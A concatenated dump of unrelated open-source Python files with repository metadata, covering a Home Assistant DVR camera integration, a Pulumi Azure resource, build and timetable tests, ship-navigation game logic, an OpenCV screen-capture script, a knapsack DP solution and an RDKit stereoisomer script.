_DEV_DS_REC = "stop_recording"
_DEV_SNAP = "snapshot"
CAMERA_SERVICES = {
_DEV_EN_ALT: "async_enable_alerts",
_DEV_DS_ALT: "async_disable_alerts",
_DEV_EN_REC: "async_start_recording",
_DEV_DS_REC: "async_stop_recording",
_DEV_SNAP: "async_snapshot",
}
async def async_setup_entry(
hass, config_entry, async_add_entities, discovery_info=None
):
"""Set up the Agent cameras."""
filter_urllib3_logging()
cameras = []
server = hass.data[AGENT_DOMAIN][config_entry.entry_id][CONNECTION]
if not server.devices:
_LOGGER.warning("Could not fetch cameras from Agent server")
return
for device in server.devices:
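        # Only devices reported with typeID 2 (cameras) get a camera entity.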
if device.typeID == 2:
camera = AgentCamera(device)
cameras.append(camera)
async_add_entities(cameras)
platform = entity_platform.current_platform.get()
for service, method in CAMERA_SERVICES.items():
platform.async_register_entity_service(service, {}, method)
class AgentCamera(MjpegCamera):
"""Representation of an Agent Device Stream."""
def __init__(self, device):
"""Initialize as a subclass of MjpegCamera."""
self._servername = device.client.name
self.server_url = device.client._server_url
device_info = {
CONF_NAME: device.name,
CONF_MJPEG_URL: f"{self.server_url}{device.mjpeg_image_url}&size={device.mjpegStreamWidth}x{device.mjpegStreamHeight}",
CONF_STILL_IMAGE_URL: f"{self.server_url}{device.still_image_url}&size={device.mjpegStreamWidth}x{device.mjpegStreamHeight}",
}
self.device = device
self._removed = False
self._name = f"{self._servername} {device.name}"
self._unique_id = f"{device._client.unique}_{device.typeID}_{device.id}"
super().__init__(device_info)
@property
def device_info(self):
"""Return the device info for adding the entity to the agent object."""
return {
"identifiers": {(AGENT_DOMAIN, self._unique_id)},
"name": self._name,
"manufacturer": "Agent",
"model": "Camera",
"sw_version": self.device.client.version,
}
async def async_update(self):
"""Update our state from the Agent API."""
try:
await self.device.update()
if self._removed:
_LOGGER.debug("%s reacquired", self._name)
self._removed = False
except AgentError:
if self.device.client.is_available: # server still available - camera error
if not self._removed:
_LOGGER.error("%s lost", self._name)
self._removed = True
@property
def extra_state_attributes(self):
"""Return the Agent DVR camera state attributes."""
return {
ATTR_ATTRIBUTION: ATTRIBUTION,
"editable": False,
"enabled": self.is_on,
"connected": self.connected,
"detected": self.is_detected,
"alerted": self.is_alerted,
"has_ptz": self.device.has_ptz,
"alerts_enabled": self.device.alerts_active,
}
@property
def should_poll(self) -> bool:
"""Update the state periodically."""
return True
@property
def is_recording(self) -> bool:
"""Return whether the monitor is recording."""
return self.device.recording
@property
def is_alerted(self) -> bool:
"""Return whether the monitor has alerted."""
return self.device.alerted
@property
def is_detected(self) -> bool:
"""Return whether the monitor has alerted."""
return self.device.detected
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self.device.client.is_available
@property
def connected(self) -> bool:
"""Return True if entity is connected."""
return self.device.connected
@property
def supported_features(self) -> int:
"""Return supported features."""
return SUPPORT_ON_OFF
@property
def is_on(self) -> bool:
"""Return true if on."""
return self.device.online
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
if self.is_on:
return "mdi:camcorder"
return "mdi:camcorder-off"
@property
def motion_detection_enabled(self):
"""Return the camera motion detection status."""
return self.device.detector_active
@property
def unique_id(self) -> str:
"""Return a unique identifier for this agent object."""
return self._unique_id
async def async_enable_alerts(self):
"""Enable alerts."""
await self.device.alerts_on()
async def async_disable_alerts(self):
"""Disable alerts."""
await self.device.alerts_off()
async def async_enable_motion_detection(self):
"""Enable motion detection."""
await self.device.detector_on()
async def async_disable_motion_detection(self):
"""Disable motion detection."""
await self.device.detector_off()
async def async_start_recording(self):
"""Start recording."""
await self.device.record()
async def async_stop_recording(self):
"""Stop recording."""
await self.device.record_stop()
async def async_turn_on(self):
"""Enable the camera."""
await self.device.enable()
async def async_snapshot(self):
"""Take a snapshot."""
await self.device.snapshot()
async def async_turn_off(self):
"""Disable the camera."""
await self.device.disable()
| 30.078704 | 137 | 0.64322 | ["Apache-2.0"] | CantankerousBullMoose/core | homeassistant/components/agent_dvr/camera.py | 6,497 | Python |
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2015 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from pybuilder.errors import BuildFailedException
from pybuilder.plugins.python.test_plugin_helper import ReportsProcessor
from test_utils import Mock, patch
class ReportsProcessorTests(unittest.TestCase):
def setUp(self):
self.reports_processor = ReportsProcessor(Mock(), Mock())
total_time = Mock()
total_time.get_millis.return_value = 42
self.reports_processor.process_reports([], total_time)
def test_should_raise_exception_when_not_all_tests_pass(self):
self.reports_processor.tests_failed = 1
self.assertRaises(BuildFailedException, self.reports_processor.write_report_and_ensure_all_tests_passed)
def test_should_not_raise_exception_when_all_tests_pass(self):
self.reports_processor.tests_failed = 0
self.reports_processor.write_report_and_ensure_all_tests_passed()
@patch("pybuilder.plugins.python.test_plugin_helper.render_report", return_value='rendered-report')
def test_should_write_report(self, render_report):
self.reports_processor.write_report_and_ensure_all_tests_passed()
self.reports_processor.project.write_report.assert_called_with("integrationtest.json", 'rendered-report')
def test_should_parse_reports(self):
reports = [
{'test': 'name1', 'test_file':
'file1', 'success': False, 'time': 1},
{'test': 'name2', 'test_file':
'file2', 'success': False, 'time': 2},
{'test': 'name3', 'test_file':
'file3', 'success': True, 'time': 3},
{'test': 'name4', 'test_file': 'file4', 'success': True, 'time': 4}
]
self.reports_processor.process_reports(reports, Mock())
self.assertEqual(self.reports_processor.tests_failed, 2)
self.assertEqual(self.reports_processor.tests_executed, 4)
def test_should_create_test_report_with_attributes(self):
mock_time = Mock()
mock_time.get_millis.return_value = 42
self.reports_processor.process_reports([], mock_time)
self.reports_processor.tests_failed = 4
self.reports_processor.tests_executed = 42
self.reports_processor.reports = ['a', 'b', 'c']
self.assertEqual(self.reports_processor.test_report,
{
'num_of_tests': 42,
'success': False,
'tests': ['a', 'b', 'c'],
'tests_failed': 4,
'time': 42
}
)
| 39.878049 | 113 | 0.654434 | ["Apache-2.0"] | AlexeySanko/pybuilder | src/unittest/python/plugins/python/test_plugin_helper_tests.py | 3,270 | Python |
from .base import Index
from .multi import MultiIndex
from .range import RangeIndex
| 21 | 29 | 0.821429 | ["BSD-3-Clause"] | cda-group/baloo | baloo/core/indexes/__init__.py | 84 | Python |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlPoolsV3Args', 'SqlPoolsV3']
@pulumi.input_type
class SqlPoolsV3Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['SkuArgs']] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SqlPoolsV3 resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input['SkuArgs'] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
:param pulumi.Input[str] sql_pool_name: The name of the sql pool.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if location is not None:
pulumi.set(__self__, "location", location)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if sql_pool_name is not None:
pulumi.set(__self__, "sql_pool_name", sql_pool_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
"""
The sql pool SKU. The list of SKUs may vary by region and support offer.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="sqlPoolName")
def sql_pool_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the sql pool.
"""
return pulumi.get(self, "sql_pool_name")
@sql_pool_name.setter
def sql_pool_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_pool_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class SqlPoolsV3(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A sql pool resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[pulumi.InputType['SkuArgs']] sku: The sql pool SKU. The list of SKUs may vary by region and support offer.
:param pulumi.Input[str] sql_pool_name: The name of the sql pool.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlPoolsV3Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A sql pool resource.
:param str resource_name: The name of the resource.
:param SqlPoolsV3Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlPoolsV3Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
sql_pool_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["sql_pool_name"] = sql_pool_name
__props__.__dict__["tags"] = tags
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20200401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:SqlPoolsV3")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlPoolsV3, __self__).__init__(
'azure-native:synapse/v20200401preview:SqlPoolsV3',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlPoolsV3':
"""
Get an existing SqlPoolsV3 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)
__props__.__dict__["current_service_objective_name"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["requested_service_objective_name"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["sql_pool_guid"] = None
__props__.__dict__["status"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return SqlPoolsV3(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="currentServiceObjectiveName")
def current_service_objective_name(self) -> pulumi.Output[str]:
"""
The current service level objective name of the sql pool.
"""
return pulumi.get(self, "current_service_objective_name")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of SqlPool.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requestedServiceObjectiveName")
def requested_service_objective_name(self) -> pulumi.Output[str]:
"""
The requested service level objective name of the sql pool.
"""
return pulumi.get(self, "requested_service_objective_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
"""
The sql pool SKU. The list of SKUs may vary by region and support offer.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter(name="sqlPoolGuid")
def sql_pool_guid(self) -> pulumi.Output[str]:
"""
The Guid of the sql pool.
"""
return pulumi.get(self, "sql_pool_guid")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of the sql pool.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
SystemData of SqlPool.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
| 41.303681 | 789 | 0.637653 | ["Apache-2.0"] | sebtelko/pulumi-azure-native | sdk/python/pulumi_azure_native/synapse/v20200401preview/sql_pools_v3.py | 13,465 | Python |
import cv2
from PIL import ImageGrab
import numpy as np
def main():
while True:
        # bbox specifies the capture region as (left, top, right, bottom)
img = ImageGrab.grab(bbox=(0, 40, 1075, 640))
        img_np = np.array(img)
gray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)
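        # Inverse binary threshold: pixels darker than 100 become white so
        # dark game sprites show up as blobs for contour detection.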
_, binary = cv2.threshold(gray, 100, 255, cv2.THRESH_BINARY_INV)
contours, hierarchy = cv2.findContours(
binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
image = cv2.drawContours(img_np, contours, -1, (0, 255, 0), 2)
cv2.imshow("test", image)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
print("test")
break
else:
cv2.waitKey(1)
# cv2.waitKey(0)
if __name__ == "__main__":
main()
| 29.551724 | 72 | 0.57993 | ["Apache-2.0"] | kymotsujason/crossybot | main.py | 857 | Python |
from timetableparser import TimeTableParser
from timetablewriter import TimeTableWriter
parser = TimeTableParser(False)
writer = TimeTableWriter(True)
# parser.decrypt_pdf("test/a.pdf", "out_a.pdf")
# parser.decrypt_pdf("test/b.pdf", "out_b.pdf")
csv_file_a = "test/output_week_a.csv"
csv_file_b = "test/output_week_b.csv"
# parser.extract_table_from_pdf("out_a.pdf", csv_file_a)
# parser.extract_table_from_pdf("out_b.pdf", csv_file_b)
writer.write_excel("Scott", parser.parse_csv(csv_file_a), parser.parse_csv(csv_file_b), "test/output.xlsx")
print("output file is `test/output.xlsx`")
| 42.071429 | 107 | 0.791171 | ["MIT"] | SCOTT-HAMILTON/Pdf2TimeTable | Pdf2TimeTable/test.py | 589 | Python |
# -*-coding:Utf-8 -*
# Copyright (c) 2014 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Objectif rejoindre."""
from math import fabs, radians, sqrt
from vector import Vector
from primaires.vehicule.vecteur import Vecteur
from secondaires.navigation.constantes import *
from secondaires.navigation.equipage.objectif import Objectif
class Rejoindre(Objectif):
"""Objectif rejoindre.
Cet objectif demande à un équipage de rejoindre un point précisé
en coordonnées. Le point indiqué doit être statique (il existe un
objectif particulier pour les points mobiles, comme les navires, qui
intègrent leur propre calcul).
Cet objectif est responsable de trouver un chemin entre le point
actuel et le point visé. Cela inclut le choix de chemins
détournés si le chemin direct ne peut être pris avec des calculs qui
peuvent être assez complexes pour déterminer la vitesse et direction
des chemins intermédiaires.
"""
def __init__(self, equipage, x=None, y=None, vitesse=1):
Objectif.__init__(self, equipage, x, y, vitesse)
self.x = x
self.y = y
self.vitesse = vitesse
self.ancienne_vitesse = None
self.vitesse_optimale = vitesse
self.autre_direction = None
self.autoriser_vitesse_sup = True
self.doit_reculer = ()
def afficher(self):
"""Méthode à redéfinir retournant l'affichage de l'objectif."""
if self.doit_reculer:
return "Doit reculer"
navire = self.navire
distance = self.get_distance()
direction = (distance.direction + 90) % 360
msg_dist = get_nom_distance(distance)
return "Cap sur {}° ({}), à {}".format(round(direction),
distance.nom_direction, msg_dist)
def get_distance(self):
"""Retourne la distance (Vecteur) entre le navire et la destination.
Cette méthode crée un vecteur (class Vecteur définie dans
le module primaire vehicule) qui représente la distance entre
la position du navire et la destination.
"""
navire = self.navire
position = navire.opt_position
o_x = position.x
o_y = position.y
d_x = self.x
d_y = self.y
distance = Vecteur(d_x - o_x, d_y - o_y, 0)
return distance
def trouver_distance_min(self, cible):
"""Trouve la distance minimum.
Cette distance est fonction de la distance minimum entre
une salle du navire d'origine et une salle du navire cible.
"""
navire = self.navire
etendue = navire.etendue
altitude = etendue.altitude
salle_cible = None
distance = None
for salle in navire.salles.values():
if salle.coords.z != altitude:
continue
x, y = salle.coords.x, salle.coords.y
for t_salle in cible.salles.values():
if t_salle.coords.z != altitude:
continue
t_x, t_y = t_salle.coords.x, t_salle.coords.y
t_distance = sqrt((t_x - x) ** 2 + (t_y - y) ** 2)
if distance is None or t_distance < distance:
distance = t_distance
salle_cible = t_salle
return distance, salle_cible
def transmettre_controles(self):
"""Donne les contrôles indiqués (vitesse et direction)."""
equipage = self.equipage
navire = self.navire
distance = self.get_distance()
if self.autre_direction:
direction = round(self.autre_direction)
else:
direction = round(distance.direction)
        # Create or update the controls
if equipage.controles.get("direction"):
equipage.controles["direction"].direction = direction
else:
equipage.controler("direction", direction)
vitesse = self.vitesse
if equipage.controles.get("vitesse"):
ancienne_vitesse = equipage.controles["vitesse"].vitesse
equipage.controles["vitesse"].vitesse = vitesse
if vitesse != ancienne_vitesse:
equipage.controles["vitesse"].calculer_vitesse()
else:
equipage.controler("vitesse", self.vitesse,
self.autoriser_vitesse_sup)
def trouver_cap(self):
"""Trouve le cap, tenant compte des obstacles."""
equipage = self.equipage
navire = self.navire
        # If the ship has to back up, check that this is still the case
if self.doit_reculer:
x, y = self.doit_reculer
p_x = navire.position.x
p_y = navire.position.y
max_distance = navire.get_max_distance_au_centre()
if sqrt((x - p_x) ** 2 + (y - p_y) ** 2) > max_distance + 1:
self.doit_reculer = ()
else:
return
        # Examine the points reported by the lookout
        # Without a lookout, there is no way to avoid them
tries = equipage.vigie_tries
        # If the dictionary is empty, do nothing
if not tries:
self.autre_direction = None
self.transmettre_controles()
return
        # Only consider the obstacles
obstacles = tries.get("obstacle", {}).copy()
obstacles.update(tries.get("salle", {}))
obstacles.update(tries.get("sallenavire", {}))
        # Only keep obstacles at a dangerous bearing,
        # between -90° and 90°
dangereux = obstacles.copy()
for angle in obstacles.keys():
if angle < -90 or angle > 90:
del dangereux[angle]
        # If there is no obstacle, stop here
if not dangereux:
self.ancienne_vitesse = None
self.autre_direction = None
self.transmettre_controles()
return
        # Now look for the shortest distance
min_angle = None
min_distance = None
for angle, (vecteur, point) in dangereux.items():
if min_distance is None or vecteur.mag < min_distance:
min_distance = vecteur.mag
min_angle = angle
        # Adjust the speed according to that distance
if -45 <= min_angle <= 45:
if min_distance <= 2:
self.vitesse = 0.05
elif min_distance < 10:
self.vitesse = 0.2
elif min_distance < 25:
self.vitesse = 0.6
        # Then look for the best heading
        # The best possible heading is the one that stays clear the longest
distance = 30
angles = [i * 5 for i in range(0, 35)]
for i in range(1, 35):
angles.append(i * -5)
        # If the ship is not heading exactly toward the point (x, y),
        # consider changing course
o_distance = self.get_distance()
if o_distance.norme < 30:
distance = o_distance.norme
relative = o_distance.direction - navire.direction.direction
angles = sorted(angles, key=lambda a: fabs(a - relative))
position = navire.opt_position
while distance > 0:
for angle in angles:
vecteur = navire.opt_direction
vecteur.mag = distance
vecteur.around_z(radians(angle))
if not navire.controller_collision(vecteur, collision=False,
marge=0.8):
if angle != 0:
self.info("Cap libre sur {}°".format(angle))
self.autre_direction = round((
navire.direction.direction + angle) % 360)
if fabs(angle) > 30:
self.vitesse = 0
self.transmettre_controles()
return
distance -= 5
        # The heading does not change, but the speed may have
self.transmettre_controles()
def creer(self):
"""L'objectif est créé.
On crée les contrôles associéss pour atteindre l'objectif
visé, à savoir, rejoindre le point (x, y), en essayant
de trouver les obstacles corresondant et un cap de remplacement
si nécessaire.
"""
equipage = self.equipage
commandant = self.commandant
if commandant is None:
return
self.trouver_cap()
def verifier(self, prioritaire):
"""Vérifie que l'objectif est toujours valide.
Dans cette méthode, on vérifie :
Qu'il n'y a aucun obstacle sur la trajectoire assignée
"""
equipage = self.equipage
navire = self.navire
commandant = self.commandant
if commandant is None:
return
if prioritaire:
self.trouver_cap()
def reagir_collision(self, salle, contre):
"""Réagit à une collision."""
if not self.doit_reculer:
commandant = self.commandant
if commandant is None:
return
personnage = commandant.personnage
navire = self.navire
equipage = self.equipage
p_x = navire.position.x
p_y = navire.position.y
self.warning("Essaye de faire reculer le navire")
self.doit_reculer = (p_x, p_y)
            # Remove the heading control, if it exists
equipage.retirer_controle("direction")
if navire.gouvernail:
equipage.demander("relacher_gouvernail",
personnage=personnage)
            # Ask to furl the sails if needed
if any(v.hissee for v in navire.voiles):
equipage.demander("plier_voiles", None, personnage=personnage)
            # Ask to row in reverse
rames = navire.rames
if rames:
                # The oars must be centered first if needed
if any(r.orientation != 0 for r in rames):
equipage.demander("ramer", "centre",
personnage=personnage)
equipage.demander("ramer", "arrière", personnage=personnage)
| 36.12037 | 79 | 0.608989 | [
"BSD-3-Clause"
] | stormi/tsunami | src/secondaires/navigation/equipage/objectifs/rejoindre.py | 11,757 | Python |
"""
724. Minimum Partition
https://www.lintcode.com/problem/minimum-partition/description
0/1 knapsack
Algorithm class 2020, C27: a 0/1 knapsack variant
First DP formulation
dp[i][j]: using the first i items to reach a sum of at most j, the maximum achievable sum
dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - nums[i - 1]] + nums[i - 1])
dp[0][0] = 0
dp[i][0] = 0
answer
total_sum - 2 * max(dp[n])
2-D dp array
time limit exceeded
"""
class Solution:
"""
@param nums: the given array
@return: the minimum difference between their sums
"""
def findMin(self, nums):
# write your code here
if not nums:
return 0
n = len(nums)
total_sum = sum(nums)
target = total_sum // 2
dp = [[0] * (target + 1) for _ in range(2)]
now, old = 0, 0
for i in range(1, n + 1):
old = now
now = 1 - now
for j in range(0, target + 1):
dp[now][j] = dp[old][j]
if j >= nums[i - 1]:
dp[now][j] = max(dp[now][j], dp[old][j - nums[i - 1]] + nums[i - 1])
return total_sum - 2 * max(dp[now])
s = Solution()
nums = [987,523,979,847,734,706,452,903,702,332,713,181,991,843,879,505,718,694,18,303,795,521,696,388,866,908,350,528,445,780,864,295,257,337,704,648,495,949,39,33,606,553,618,191,854,405,715,413,472,185,216,489,212,199,162,462,929,191,429,726,902,9,579,403,370,435,871,160,197,884,619,716,182,7,906,974,679,531,852,158,861,174,445,701,871,557,942,798,921,389,450,485,901,179,515,401,117,451,731,828,685,20,50,673,891,232,30,385,511,338,375,118,81,392,296,546,903,59,580,620,268,422,597,876,333,766,158,295,443,204,434,357,632,592,543,341,434,58,525,683,338,165,332,51,152,191,378,63,10,475,951,469,622,811,296,415,282,547,994,358,134,195,888,75,195,805,908,673,867,346,935,318,603,507,45,209,54,641,515,867,881,880,290,781,452,808,775,998,731,908,451,592,608,87,1000,812,30,673,393,380,241,135,421,144,954,64,747,502,633]
print(s.findMin(nums)) | 37.230769 | 823 | 0.61312 | [
"MIT"
] | jianershi/algorithm | lintcode/724.1.py | 1,962 | Python |
from rdkit import Chem
from rdkit.Chem.EnumerateStereoisomers import EnumerateStereoisomers, StereoEnumerationOptions
# Each input line is expected to hold "<generation>\t<SMILES>".
with open('glucose_degradation_output.csv', 'r') as molecules:
    lines = molecules.readlines()
counter = 0
with open('Glucose_Desc.csv', 'w') as the_file:
    the_file.write("Generation,Id,NumStereoIsomers" + '\n')
    for line in lines:
        counter += 1
        line = line.rstrip('\n')
        line = line.split('\t')
        m = Chem.MolFromSmiles(line[1])
        if m is None:
            # Skip rows whose SMILES cannot be parsed
            continue
        isomers = tuple(EnumerateStereoisomers(m))
        numste = str(len(isomers))
        the_file.write(line[0] + "," + line[1] + "," + numste + '\n')
| 33.352941 | 94 | 0.730159 | [
"BSD-3-Clause"
] | Reaction-Space-Explorer/reac-space-exp | plots/stereoisomer_gen.py | 567 | Python |
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from django import forms
from taggit.forms import TagField
from dcim.models import Device
from extras.forms import (
AddRemoveTagsForm, CustomFieldBulkEditForm, CustomFieldFilterForm, CustomFieldModelForm, CustomFieldModelCSVForm,
)
